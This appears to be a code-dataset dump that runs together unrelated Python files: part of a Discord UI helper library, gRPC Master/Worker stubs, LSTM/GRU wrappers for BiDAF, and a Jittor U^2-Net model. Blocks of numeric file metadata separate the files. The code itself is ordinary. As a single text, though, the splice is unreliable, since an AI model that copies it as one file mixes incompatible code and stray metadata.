self.root_ = lambda: BtnAnd3DropMenu(self.author, self.btn1, self.menu1, self.menu2,
self.menu3, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class BtnAnd4DropMenu:
def __init__(self, author: discord.Member, button1: SButton,
menu1: SDropMenu, menu2: SDropMenu, menu3: SDropMenu, menu4: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param menu2: takes dropmenu type SDropMenu
:param menu3: takes dropmenu type SDropMenu
:param menu4: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.menu1 = menu1
self.menu2 = menu2
self.menu3 = menu3
self.menu4 = menu4
self.components = [self.btn1, self.menu1,
self.menu2, self.menu3, self.menu4]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: BtnAnd4DropMenu(self.author, self.btn1, self.menu1, self.menu2,
self.menu3, self.menu4, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class MultiBtnAndDropMenu:
def __init__(self, author: discord.Member, buttons: List[SButton], menus: List[SDropMenu],
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param buttons: takes List of button type SButton
:param menus: takes List of dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btns: List = buttons
self.menus: List = menus
components: List = self.btns + self.menus
for component_ in components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: MultiBtnAndDropMenu(
self.author, self.btns, self.menus, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for btn_ in self.btns:
if not btn_.hidden:
view_.add_item(Btn(self.root_, btn_))
for menu_ in self.menus:
if not menu_.hidden:
view_.add_item(Menu(self.root_, menu_))
return view_
MultiBtnAndMenu = MultiBtnAndDropMenu
class MultiBtnsAndMenus:
def __init__(self, author: discord.Member, components: List[Union[SButton, SDropMenu]],
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
🌟 Full Flexibility
Responsive Buttons and DropMenus
:param author: Interaction User
:param components: Takes List of components (both buttons and drop menus)
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.components = components
for component in self.components:
if component.author is None:
component.update(author=self.author)
self.root_ = lambda: MultiBtnsAndMenus(
self.author, self.components, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component in self.components:
if not component.hidden:
if isinstance(component, SButton):
view_.add_item(Btn(self.root_, component))
elif isinstance(component, SDropMenu):
view_.add_item(Menu(self.root_, component))
else:
raise ValueError("The given components are Invalid !")
return view_
| 33.493783
| 118
| 0.593891
| 1,984
| 18,857
| 5.513105
| 0.046875
| 0.043884
| 0.030719
| 0.036204
| 0.900622
| 0.900622
| 0.884988
| 0.882063
| 0.874017
| 0.867617
| 0
| 0.020422
| 0.319669
| 18,857
| 562
| 119
| 33.553381
| 0.832099
| 0.20263
| 0
| 0.730897
| 0
| 0
| 0.002418
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079734
| false
| 0
| 0.019934
| 0
| 0.179402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d57bfa462e693b0b380d8511c85e1a27e8e755b
| 4,666
|
py
|
Python
|
src/protos/rpc_pb2_grpc.py
|
MrRobertYuan/docklet
|
70c089a6a5bb186dc3f898127af84d79b4dfab2d
|
[
"BSD-3-Clause"
] | 273
|
2016-03-23T08:54:35.000Z
|
2022-01-03T07:49:23.000Z
|
src/protos/rpc_pb2_grpc.py
|
FirmlyReality/docklet
|
203113a5efff89fc961d119de38e5d3759af6f5d
|
[
"BSD-3-Clause"
] | 115
|
2016-04-01T09:51:34.000Z
|
2019-11-14T00:00:48.000Z
|
src/protos/rpc_pb2_grpc.py
|
FirmlyReality/docklet
|
203113a5efff89fc961d119de38e5d3759af6f5d
|
[
"BSD-3-Clause"
] | 64
|
2016-03-31T08:38:29.000Z
|
2021-09-20T07:26:06.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from protos import rpc_pb2 as rpc__pb2
class MasterStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.report = channel.unary_unary(
'/Master/report',
request_serializer=rpc__pb2.ReportMsg.SerializeToString,
response_deserializer=rpc__pb2.Reply.FromString,
)
class MasterServicer(object):
# missing associated documentation comment in .proto file
pass
def report(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MasterServicer_to_server(servicer, server):
rpc_method_handlers = {
'report': grpc.unary_unary_rpc_method_handler(
servicer.report,
request_deserializer=rpc__pb2.ReportMsg.FromString,
response_serializer=rpc__pb2.Reply.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Master', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
class WorkerStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.start_vnode = channel.unary_unary(
'/Worker/start_vnode',
request_serializer=rpc__pb2.VNodeInfo.SerializeToString,
response_deserializer=rpc__pb2.Reply.FromString,
)
self.start_task = channel.unary_unary(
'/Worker/start_task',
request_serializer=rpc__pb2.TaskInfo.SerializeToString,
response_deserializer=rpc__pb2.Reply.FromString,
)
self.stop_task = channel.unary_unary(
'/Worker/stop_task',
request_serializer=rpc__pb2.TaskInfo.SerializeToString,
response_deserializer=rpc__pb2.Reply.FromString,
)
self.stop_vnode = channel.unary_unary(
'/Worker/stop_vnode',
request_serializer=rpc__pb2.VNodeInfo.SerializeToString,
response_deserializer=rpc__pb2.Reply.FromString,
)
class WorkerServicer(object):
# missing associated documentation comment in .proto file
pass
def start_vnode(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def start_task(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def stop_task(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def stop_vnode(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_WorkerServicer_to_server(servicer, server):
rpc_method_handlers = {
'start_vnode': grpc.unary_unary_rpc_method_handler(
servicer.start_vnode,
request_deserializer=rpc__pb2.VNodeInfo.FromString,
response_serializer=rpc__pb2.Reply.SerializeToString,
),
'start_task': grpc.unary_unary_rpc_method_handler(
servicer.start_task,
request_deserializer=rpc__pb2.TaskInfo.FromString,
response_serializer=rpc__pb2.Reply.SerializeToString,
),
'stop_task': grpc.unary_unary_rpc_method_handler(
servicer.stop_task,
request_deserializer=rpc__pb2.TaskInfo.FromString,
response_serializer=rpc__pb2.Reply.SerializeToString,
),
'stop_vnode': grpc.unary_unary_rpc_method_handler(
servicer.stop_vnode,
request_deserializer=rpc__pb2.VNodeInfo.FromString,
response_serializer=rpc__pb2.Reply.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Worker', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 33.328571
| 69
| 0.728461
| 511
| 4,666
| 6.34638
| 0.142857
| 0.040703
| 0.049337
| 0.102683
| 0.894542
| 0.855072
| 0.855072
| 0.819303
| 0.73913
| 0.73913
| 0
| 0.005817
| 0.189456
| 4,666
| 139
| 70
| 33.568345
| 0.851666
| 0.142735
| 0
| 0.555556
| 1
| 0
| 0.094588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.090909
| 0.020202
| 0
| 0.151515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ed8d77bd171212ba346e5e440a72f3f75dfa0931
| 5,479
|
py
|
Python
|
Models/BiDAF/wrapper.py
|
nguyenvo09/EACL2021
|
9d04d8954c1ded2110daac23117de11221f08cc6
|
[
"MIT"
] | 27
|
2021-01-18T16:03:17.000Z
|
2022-03-05T22:38:34.000Z
|
Models/BiDAF/wrapper.py
|
nguyenvo09/EACL2021
|
9d04d8954c1ded2110daac23117de11221f08cc6
|
[
"MIT"
] | null | null | null |
Models/BiDAF/wrapper.py
|
nguyenvo09/EACL2021
|
9d04d8954c1ded2110daac23117de11221f08cc6
|
[
"MIT"
] | 1
|
2021-11-24T08:23:09.000Z
|
2021-11-24T08:23:09.000Z
|
import torch
import torch.nn as nn
class LSTM(nn.Module):
def __init__(self, input_size, hidden_size, batch_first=False, num_layers=1, bidirectional=False, dropout=0.2):
super(LSTM, self).__init__()
self.rnn = nn.LSTM(input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bidirectional=bidirectional,
batch_first=batch_first)
self.reset_params()
self.dropout = nn.Dropout(p=dropout)
def reset_params(self):
for i in range(self.rnn.num_layers):
nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s' % i))
nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s' % i))
nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s' % i), val=0)
nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s' % i), val=0)
getattr(self.rnn, 'bias_hh_l%s' % i).chunk(4)[1].fill_(1)
if self.rnn.bidirectional:
nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s_reverse' % i))
nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s_reverse' % i))
nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s_reverse' % i), val=0)
nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s_reverse' % i), val=0)
getattr(self.rnn, 'bias_hh_l%s_reverse' % i).chunk(4)[1].fill_(1)
def forward(self, x, return_h=True, max_len=None):
x, x_len, d_new_indices, d_restoring_indices = x
x = self.dropout(x)
# x_idx = d_new_indices
x_len_sorted = x_len[d_new_indices]
# x_len_sorted, x_idx = torch.sort(x_len, descending=True)
x_sorted = x[d_new_indices] # x.index_select(dim=0, index=x_idx)
x_ori_idx = d_restoring_indices
# _, x_ori_idx = torch.sort(x_idx)
x_packed = nn.utils.rnn.pack_padded_sequence(x_sorted, x_len_sorted, batch_first=True)
x_packed, (h, c) = self.rnn(x_packed)
x = nn.utils.rnn.pad_packed_sequence(x_packed, batch_first=True, total_length=max_len)[0]
# x = x.index_select(dim=0, index=x_ori_idx)
x = x[x_ori_idx]
if return_h:
h = h.permute(1, 0, 2).contiguous().view(-1, h.size(0) * h.size(2)) #.squeeze()
# h = h.index_select(dim=0, index=x_ori_idx)
h = h[x_ori_idx]
return x, h
class GRU(nn.Module):
def __init__(self, input_size, hidden_size, batch_first=False, num_layers=1, bidirectional=False, dropout=0.2):
super(GRU, self).__init__()
self.rnn = nn.GRU(input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bidirectional=bidirectional,
batch_first=batch_first)
self.reset_params()
self.dropout = nn.Dropout(p=dropout)
def reset_params(self):
for i in range(self.rnn.num_layers):
nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s' % i))
nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s' % i))
nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s' % i), val=0)
nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s' % i), val=0)
getattr(self.rnn, 'bias_hh_l%s' % i).chunk(4)[1].fill_(1)
if self.rnn.bidirectional:
nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s_reverse' % i))
nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s_reverse' % i))
nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s_reverse' % i), val=0)
nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s_reverse' % i), val=0)
getattr(self.rnn, 'bias_hh_l%s_reverse' % i).chunk(4)[1].fill_(1)
def forward(self, x, return_h=True, max_len=None):
x, x_len, d_new_indices, d_restoring_indices = x
x = self.dropout(x)
# x_idx = d_new_indices
x_len_sorted = x_len[d_new_indices]
# x_len_sorted, x_idx = torch.sort(x_len, descending=True)
x_sorted = x[d_new_indices] # x.index_select(dim=0, index=x_idx)
x_ori_idx = d_restoring_indices
# _, x_ori_idx = torch.sort(x_idx)
x_packed = nn.utils.rnn.pack_padded_sequence(x_sorted, x_len_sorted, batch_first=True)
# x_packed, (h, c) = self.rnn(x_packed)
x_packed, h = self.rnn(x_packed) # this is for GRU not LSTM
x = nn.utils.rnn.pad_packed_sequence(x_packed, batch_first=True, total_length=max_len)[0]
# x = x.index_select(dim=0, index=x_ori_idx)
x = x[x_ori_idx]
if return_h:
h = h.permute(1, 0, 2).contiguous().view(-1, h.size(0) * h.size(2)) # .squeeze()
# h = h.index_select(dim=0, index=x_ori_idx)
h = h[x_ori_idx]
return x, h
class Linear(nn.Module):
def __init__(self, in_features, out_features, dropout=0.0):
super(Linear, self).__init__()
self.linear = nn.Linear(in_features=in_features, out_features=out_features)
if dropout > 0:
self.dropout = nn.Dropout(p=dropout)
self.reset_params()
def reset_params(self):
nn.init.kaiming_normal_(self.linear.weight)
nn.init.constant_(self.linear.bias, 0)
def forward(self, x):
if hasattr(self, 'dropout'): x = self.dropout(x)
x = self.linear(x)
return x
| 44.544715
| 115
| 0.605585
| 838
| 5,479
| 3.652745
| 0.107399
| 0.066318
| 0.091473
| 0.070565
| 0.879451
| 0.857563
| 0.848416
| 0.848416
| 0.848416
| 0.848416
| 0
| 0.012398
| 0.263917
| 5,479
| 122
| 116
| 44.909836
| 0.746591
| 0.100201
| 0
| 0.766667
| 0
| 0
| 0.065744
| 0.017098
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.022222
| 0
| 0.188889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edbadc482d03739e5c9fe88d171ebce36e2e568f
| 34,276
|
py
|
Python
|
model/U2Net.py
|
THU-CVlab/JMedSeg
|
1c9c66a1b2c6e4c5e3f70ca9e1ed54447b944755
|
[
"MIT"
] | 26
|
2021-08-19T05:22:44.000Z
|
2022-03-08T05:44:43.000Z
|
model/U2Net.py
|
Jittor/JMedSeg
|
1c9c66a1b2c6e4c5e3f70ca9e1ed54447b944755
|
[
"MIT"
] | null | null | null |
model/U2Net.py
|
Jittor/JMedSeg
|
1c9c66a1b2c6e4c5e3f70ca9e1ed54447b944755
|
[
"MIT"
] | 3
|
2021-08-19T06:12:49.000Z
|
2021-08-19T11:41:16.000Z
|
'''
https://github.com/xuebinqin/U-2-Net
'''
import jittor as jt
from jittor import init
from jittor import nn
class REBNCONV(nn.Module):
def __init__(self, in_ch=3, out_ch=3, dirate=1):
super(REBNCONV, self).__init__()
self.conv_s1 = nn.Conv(in_ch, out_ch, 3, padding=(1 * dirate), dilation=(1 * dirate))
self.bn_s1 = nn.BatchNorm(out_ch)
self.relu_s1 = nn.ReLU()
def execute(self, x):
hx = x
xout = self.relu_s1(self.bn_s1(self.conv_s1(hx)))
return xout
def _upsample_like(src, tar):
src = nn.upsample(src, size=tar.shape[2:], mode='bilinear')
return src
### RSU-7 ###
class RSU7(nn.Module):
def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
super(RSU7, self).__init__()
self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool3 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool4 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv5 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool5 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv6 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.rebnconv7 = REBNCONV(mid_ch, mid_ch, dirate=2)
self.rebnconv6d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv5d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv4d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)
def execute(self, x):
hx = x
hxin = self.rebnconvin(hx)
hx1 = self.rebnconv1(hxin)
hx = self.pool1(hx1)
hx2 = self.rebnconv2(hx)
hx = self.pool2(hx2)
hx3 = self.rebnconv3(hx)
hx = self.pool3(hx3)
hx4 = self.rebnconv4(hx)
hx = self.pool4(hx4)
hx5 = self.rebnconv5(hx)
hx = self.pool5(hx5)
hx6 = self.rebnconv6(hx)
hx7 = self.rebnconv7(hx6)
hx6d = self.rebnconv6d(jt.contrib.concat((hx7, hx6), dim=1))
hx6dup = _upsample_like(hx6d, hx5)
hx5d = self.rebnconv5d(jt.contrib.concat((hx6dup, hx5), dim=1))
hx5dup = _upsample_like(hx5d, hx4)
hx4d = self.rebnconv4d(jt.contrib.concat((hx5dup, hx4), dim=1))
hx4dup = _upsample_like(hx4d, hx3)
hx3d = self.rebnconv3d(jt.contrib.concat((hx4dup, hx3), dim=1))
hx3dup = _upsample_like(hx3d, hx2)
hx2d = self.rebnconv2d(jt.contrib.concat((hx3dup, hx2), dim=1))
hx2dup = _upsample_like(hx2d, hx1)
hx1d = self.rebnconv1d(jt.contrib.concat((hx2dup, hx1), dim=1))
return (hx1d + hxin)
### RSU-6 ###
class RSU6(nn.Module):
def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
super(RSU6, self).__init__()
self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool3 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool4 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv5 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.rebnconv6 = REBNCONV(mid_ch, mid_ch, dirate=2)
self.rebnconv5d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv4d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)
def execute(self, x):
hx = x
hxin = self.rebnconvin(hx)
hx1 = self.rebnconv1(hxin)
hx = self.pool1(hx1)
hx2 = self.rebnconv2(hx)
hx = self.pool2(hx2)
hx3 = self.rebnconv3(hx)
hx = self.pool3(hx3)
hx4 = self.rebnconv4(hx)
hx = self.pool4(hx4)
hx5 = self.rebnconv5(hx)
hx6 = self.rebnconv6(hx5)
hx5d = self.rebnconv5d(jt.contrib.concat((hx6, hx5), dim=1))
hx5dup = _upsample_like(hx5d, hx4)
hx4d = self.rebnconv4d(jt.contrib.concat((hx5dup, hx4), dim=1))
hx4dup = _upsample_like(hx4d, hx3)
hx3d = self.rebnconv3d(jt.contrib.concat((hx4dup, hx3), dim=1))
hx3dup = _upsample_like(hx3d, hx2)
hx2d = self.rebnconv2d(jt.contrib.concat((hx3dup, hx2), dim=1))
hx2dup = _upsample_like(hx2d, hx1)
hx1d = self.rebnconv1d(jt.contrib.concat((hx2dup, hx1), dim=1))
return (hx1d + hxin)
### RSU-5 ###
class RSU5(nn.Module):
def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
super(RSU5, self).__init__()
self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool3 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.rebnconv5 = REBNCONV(mid_ch, mid_ch, dirate=2)
self.rebnconv4d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)
def execute(self, x):
hx = x
hxin = self.rebnconvin(hx)
hx1 = self.rebnconv1(hxin)
hx = self.pool1(hx1)
hx2 = self.rebnconv2(hx)
hx = self.pool2(hx2)
hx3 = self.rebnconv3(hx)
hx = self.pool3(hx3)
hx4 = self.rebnconv4(hx)
hx5 = self.rebnconv5(hx4)
hx4d = self.rebnconv4d(jt.contrib.concat((hx5, hx4), dim=1))
hx4dup = _upsample_like(hx4d, hx3)
hx3d = self.rebnconv3d(jt.contrib.concat((hx4dup, hx3), dim=1))
hx3dup = _upsample_like(hx3d, hx2)
hx2d = self.rebnconv2d(jt.contrib.concat((hx3dup, hx2), dim=1))
hx2dup = _upsample_like(hx2d, hx1)
hx1d = self.rebnconv1d(jt.contrib.concat((hx2dup, hx1), dim=1))
return (hx1d + hxin)
### RSU-4 ###
class RSU4(nn.Module):
def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
super(RSU4, self).__init__()
self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=2)
self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)
def execute(self, x):
hx = x
hxin = self.rebnconvin(hx)
hx1 = self.rebnconv1(hxin)
hx = self.pool1(hx1)
hx2 = self.rebnconv2(hx)
hx = self.pool2(hx2)
hx3 = self.rebnconv3(hx)
hx4 = self.rebnconv4(hx3)
hx3d = self.rebnconv3d(jt.contrib.concat((hx4, hx3), dim=1))
hx3dup = _upsample_like(hx3d, hx2)
hx2d = self.rebnconv2d(jt.contrib.concat((hx3dup, hx2), dim=1))
hx2dup = _upsample_like(hx2d, hx1)
hx1d = self.rebnconv1d(jt.contrib.concat((hx2dup, hx1), dim=1))
return (hx1d + hxin)
### RSU-4F ### # No pooling
class RSU4F(nn.Module):
def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
super(RSU4F, self).__init__()
self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=2)
self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=4)
self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=8)
self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=4)
self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=2)
self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)
def execute(self, x):
hx = x
hxin = self.rebnconvin(hx)
hx1 = self.rebnconv1(hxin)
hx2 = self.rebnconv2(hx1)
hx3 = self.rebnconv3(hx2)
hx4 = self.rebnconv4(hx3)
hx3d = self.rebnconv3d(jt.contrib.concat((hx4, hx3), dim=1))
hx2d = self.rebnconv2d(jt.contrib.concat((hx3d, hx2), dim=1))
hx1d = self.rebnconv1d(jt.contrib.concat((hx2d, hx1), dim=1))
return (hx1d + hxin)
##### U^2-Net ####
class U2NET(nn.Module):
def __init__(self, in_ch=3, n_classes=2):
super(U2NET, self).__init__()
# encoder
self.stage1 = RSU7(in_ch, 32, 64)
self.pool12 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage2 = RSU6(64, 32, 128)
self.pool23 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage3 = RSU5(128, 64, 256)
self.pool34 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage4 = RSU4(256, 128, 512)
self.pool45 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage5 = RSU4F(512, 256, 512)
self.pool56 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage6 = RSU4F(512, 256, 512)
# decoder
self.stage5d = RSU4F(1024, 256, 512)
self.stage4d = RSU4(1024, 128, 256)
self.stage3d = RSU5(512, 64, 128)
self.stage2d = RSU6(256, 32, 64)
self.stage1d = RSU7(128, 16, 64)
self.side1 = nn.Conv(64, n_classes, 3, padding=1)
self.side2 = nn.Conv(64, n_classes, 3, padding=1)
self.side3 = nn.Conv(128, n_classes, 3, padding=1)
self.side4 = nn.Conv(256, n_classes, 3, padding=1)
self.side5 = nn.Conv(512, n_classes, 3, padding=1)
self.side6 = nn.Conv(512, n_classes, 3, padding=1)
self.outconv = nn.Conv((6 * n_classes), n_classes, 1)
def execute(self, x):
#-------------------- encoder -------------------
hx = x
#stage 1
hx1 = self.stage1(hx)
hx = self.pool12(hx1)
#stage 2
hx2 = self.stage2(hx)
hx = self.pool23(hx2)
#stage 3
hx3 = self.stage3(hx)
hx = self.pool34(hx3)
#stage 4
hx4 = self.stage4(hx)
hx = self.pool45(hx4)
#stage 5
hx5 = self.stage5(hx)
hx = self.pool56(hx5)
#stage 6
hx6 = self.stage6(hx)
hx6up = _upsample_like(hx6, hx5)
#-------------------- decoder -------------------
hx5d = self.stage5d(jt.contrib.concat((hx6up, hx5), dim=1))
hx5dup = _upsample_like(hx5d, hx4)
hx4d = self.stage4d(jt.contrib.concat((hx5dup, hx4), dim=1))
hx4dup = _upsample_like(hx4d, hx3)
hx3d = self.stage3d(jt.contrib.concat((hx4dup, hx3), dim=1))
hx3dup = _upsample_like(hx3d, hx2)
hx2d = self.stage2d(jt.contrib.concat((hx3dup, hx2), dim=1))
hx2dup = _upsample_like(hx2d, hx1)
hx1d = self.stage1d(jt.contrib.concat((hx2dup, hx1), dim=1))
#side output
d1 = self.side1(hx1d)
d2 = self.side2(hx2d)
d2 = _upsample_like(d2, d1)
d3 = self.side3(hx3d)
d3 = _upsample_like(d3, d1)
d4 = self.side4(hx4d)
d4 = _upsample_like(d4, d1)
d5 = self.side5(hx5d)
d5 = _upsample_like(d5, d1)
d6 = self.side6(hx6)
d6 = _upsample_like(d6, d1)
d0 = self.outconv(jt.contrib.concat((d1, d2, d3, d4, d5, d6), dim=1))
# return (jt.sigmoid(d0), jt.sigmoid(d1), jt.sigmoid(d2), jt.sigmoid(d3), jt.sigmoid(d4), jt.sigmoid(d5), jt.sigmoid(d6))
return d0
